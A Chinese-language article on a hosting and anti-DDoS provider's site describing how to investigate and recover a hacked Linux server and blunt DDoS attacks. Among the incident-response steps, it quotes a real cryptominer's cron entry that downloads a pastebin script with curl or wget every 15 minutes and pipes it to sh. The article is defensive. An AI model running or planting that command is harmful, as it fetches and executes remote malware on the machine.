行业动态

防御吧作为15年知名老牌域名服务商,CNNIC和CANN双认证域名注册商,已经
持续为500多万个域名提供服务,包括智能DNS/自由转移/隐私保护等服务!
服务器被人攻击了怎么处理
2023-02-23 11:49:19 【

很多客户网站服务器被入侵,被攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站被篡改,被跳转,首页内容被替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,s是需要立即处理的,降损失降到最低,让网站恢复正常的访问,由于每个客户找到我们SINE安全都是比较着急的,安全的处理时间也需要尽快的处理,根据我们的处理经验,我们总结了一些服务器被攻击,被黑的排查办法,专门用来检查服务器第一时间的安全问题,看发生在哪里,服务器是否被黑,是否被攻击,那些被篡改等等。

如何排查服务器被攻击?

首先我们会对当前服务器的IP,以及IP的地址,linux服务器名称,服务器的版本是centos,还是redhat,服务器的当前时间,进行收集并记录到一个txt文档里,接下来再执行下一步,对当前服务器的异常网络连接以及异常的系统进程检查,主要是通过netstat -an以及-antp命令来检查服务器存在哪些异常的IP连接。并对连接的IP,进行归属地查询,如果是国外的IP,直接记录当前进程的PID值,并自动将PID的所有信息记录,查询PID所在的linux文件地址,紧接着检查当前占用CPU大于百分之30的进程,并检查该进程所在的文件夹。

在我们处理客户服务器被攻击的时候发现很多服务器的命令被篡改,比如正常的PS查看进程的,查询目录的 cd的命令都给篡改了,让服务器无法正常使用命令,检查服务器安全造成了困扰。对服务器的启动项进行检查,有些服务器被植入木马后门,即使重启服务器也还是被攻击,木马会自动的启动,检查linux的init.d的文件夹里是否有多余的启动文件,也可以检查时间,来判断启动项是否有问题。

再一个要检查的地方是服务器的历史命令,history很多服务器被黑都会留下痕迹,比如SSH登录服务器后,攻击者对服务器进行了操作,执行了那些恶意命令都可以通过history查询的到,有没有使用wget命令下载木马,或者执行SH文件。检查服务器的所有账号,以及当前使用并登录的管理员账户,tty是本地用户登录,pst是远程连接的用户登录,来排查服务器是否被黑,被攻击,也可以检查login.defs文件的uid值,判断uid的passwd来获取最近新建的管理员账户。执行cat etc/passwd命令检查是否存在异常的用户账户,包括特权账户,UID值为0.

最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd)|sh 代码如上,自动下载并执行SH木马文件。定时任务删都删不掉,最后通过检查系统文件查到了木马,并终止进程,强制删除。有些服务器被黑后,请立即检查2天里被修改的文件,可以通过find命令去检查所有的文件,看是否有木马后门文件,如果有可以确定服务器被黑了。


如果以上方法认为解决,尝试下面的方法

备份用户数据

在服务器遭受攻击后,需要立刻备份服务器上的用户数据,同时也要查看这些数据中是否隐藏着攻击源。如果攻击源在用户数据中,一定要彻底删除,然后将用户数据备份到一个安全的地方。

重新安装系统

永远不要认为自己能彻底清除攻击源,因为没有人能比黑客更了解攻击程序,在服务器遭到攻击后,最安全也最简单的方法就是重新安装系统,因为大部分攻击程序都会依附在系统文件或者内核中,所以重新安装系统才能彻底清除攻击源。

修复程序或系统漏洞

在发现系统漏洞或者应用程序漏洞后,首先要做的就是修复系统漏洞或者更改程序bug,因为只有将程序的漏洞修复完毕才能正式在服务器上运行。

如果是DOOS攻击

1.对于低成本的应对方法,我给出几个建议。

挂cdn隐藏IP,在换成新的ip后,请务必挂cdn对真实的ip进行隐藏,这样无论怎样被攻击,cdn都可以为你进行抵御。

2.cdn还可以不止套一层,可以多层一起嵌套,网络上免费的也不少。

准备多个服务器做反向代理(配置可以不高能运行nginx就行,最好是那种空路由时间短的),每个反向代理服务器都指向主服务器节点,都绑定一个二级域名,都挂上不同的cdn。

3.主域名可以随时解析到任意一个反向代理服务器,并且可以挂免费的云监控来实时知晓状态,一个节点死了改解析就行。

4.在防火墙层面禁止所有的国外ip(这是大部分肉鸡主要来源),可以很好的降低攻击流量。

以上是比较简单,低成本的方法,如果资金充足的话,建议购买高防IP和高防CDN等防御产品,这样针对不同场景不同的环节也有针对性的防御方案,无法一概而论,当然也看您遇到的对手是什么样的级别。

因此,避免服务器遭受ddos攻击的最好是方式就是说 把高防CDN布置在好,不能让另一方 了解 你的源服务器ip ,即便 高防cdn 其中一个节点被打死 ,还可以立即切换到其他备用节点上。


】【打印关闭】 【返回顶部
分享到QQ空间
分享到: 
上一篇网站快照出现其它内容的原因与处.. 下一篇最新报告称75%的网民缺乏安全感,..

立足首都,辐射全球,防御吧专注云防御及云计算服务15年!

联系我们

服务热线:010-56157787 ,010-56159998
企业QQ:4000043998
技术支持:010-56159998
E-Mail:800@fangyuba.com
Copyright ? 2003-2016 fangyuba. 防御吧(完美解决防御与加速) 版权所有 增值许可:京B2-20140042号
售前咨询
公司总机:4000043998 01056155355
24小时电话:010-56159998
投诉电话:18910191973
值班售后/技术支持
售后服务/财务
备案专员
紧急电话:18610088800